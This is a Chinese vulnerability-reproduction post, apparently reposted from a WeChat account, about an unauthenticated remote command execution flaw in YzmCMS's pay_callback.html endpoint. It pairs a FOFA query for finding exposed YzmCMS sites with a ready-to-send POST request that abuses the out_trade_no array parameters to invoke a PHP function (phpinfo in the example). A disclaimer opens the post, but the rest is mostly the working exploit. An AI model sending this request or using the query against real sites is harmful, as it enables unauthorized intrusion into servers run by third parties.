免责声明
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
漏洞描述
YzmCMS /pay_callback.html接口存在远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统命令。
资产测绘
FOFA:app="yzmcms"
漏洞复现
POST /pay/index/pay_callback.html HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 Accept-Encoding: gzip Content-Type: application/x-www-form-urlencoded out_trade_no[0]=eq&out_trade_no[1]=1&out_trade_no[2]=phpinfo
原文始发于微信公众号(漏洞文库):【漏洞复现】YzmCMS pay_callback.html存在远程命令执行漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论